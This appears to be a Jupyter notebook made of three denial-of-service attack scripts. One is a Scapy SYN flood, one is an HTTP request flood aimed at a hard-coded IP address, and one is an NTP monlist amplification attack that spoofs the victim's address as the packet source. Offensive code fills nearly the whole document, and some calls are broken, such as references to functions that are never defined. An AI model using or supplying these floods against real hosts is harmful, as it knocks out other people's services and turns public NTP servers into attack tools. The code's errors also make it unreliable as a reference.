In [ ]:
from scapy.all import *
import socket
import threading
import time
import random

def synFlood():
        
        global src
        global dst
        
        Layer3 = IP(src=src, dst=dst)
        Layer4 = TCP(sport=random.randint(2000,65535), dport=random.randint(2000,65535), flags='S') # flag S to indicate a SYN packet
        data = b"X"*1024
        raw = Raw(load=data) # adding some raw data for flooding
        
        packet = Layer3/Layer4/raw #making a packet by stacking layer 4 on layer3 and layer3 on layer2 
        
        # send the constructed packet in a loop until CTRL+C is detected 
        send(packet) #loop=1 verbose=0)

try:
    if len(sys.argv) < 2:
        print("USAGE: synFLood.py <IP_ADRESS> <NO OF THREADS>")
        exit(0)
    else:
        #get IP address of the victim machine
        hostname = socket.gethostname()
        ipAddr = socket.gethostbyname(hostname)

        src = ipAddr
        dst = sys.argv[1]
        
        threads = []
        noOfThreads = sys.argv[2]
        
        for n in range(noOfThreads):
                thread = threading.Thread(target=synFLood)
                thread.daemon = True
                thread.start()

                threads.append(thread)

        print('Sending....\n')
        while True:
            time.sleep(1)
            
except KeyboardInterrupt:
    print('Quitting..........')
        

In [ ]:
import requests


def http_flood(url, params):
    
    for i in range(1,100):
        r = requests.get(url=url, params=params)
        print("Request Sent")

url = 'http://182.180.51.177'
params = {'text': 'passwords'}

http_flood(url,params)

In [ ]:
from scapy.all import * 
import socket
import sys
import threading
import time
import random


def ntp_attack():
	#Import globals to function
	global ntplist
	global currentserver
	global data
	global target
	ntpserver = ntplist[currentserver] #Get new server
	currentserver = currentserver + 1 #Increment for next 
	packet = IP(dst=ntpserver,src=target)/UDP(sport=random.randint(2000,65535),dport=123)/Raw(load=data) #BUILD IT
	send(packet,loop=1) #SEND IT
 
 
try: 
    if len(sys.argv) < 4:
        print('Less arguments')
        print("Usage: <target ip> <ntpserver list> <number of threads>")
        print("ex: ntpdos.py 1.2.3.4 file.txt 10")
    else:
        target = sys.argv[1]
        ntpserverfile = sys.argv[2]
        numberthreads = int(sys.argv[3])
        #System for accepting bulk input
        ntplist = []
        currentserver = 0
        with open(ntpserverfile) as f:
            ntplist = f.readlines()

        #Make sure we dont out of bounds
        if  numberthreads > int(len(ntplist)):
            print ("Attack Aborted: More threads than servers")
            print ("Next time dont create more threads than servers")
            exit(0)

        #Magic Packet aka NTP v2 Monlist Packet
        data = "\x17\x00\x03\x2a" + "\x00" * 4

        #Hold our threads
        threads = []
        print ("Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads")
        print ("Use CTRL+C to stop attack")

        #Thread spawner
        for n in range(numberthreads):
            thread = threading.Thread(target=deny)
            thread.daemon = True
            thread.start()

            threads.append(thread)

        #In progress!
        print( "Sending...")

        #Keep alive so ctrl+c still kills all them threads
        while True:
            time.sleep(1)
except KeyboardInterrupt:
    print('Quitting.........')
                      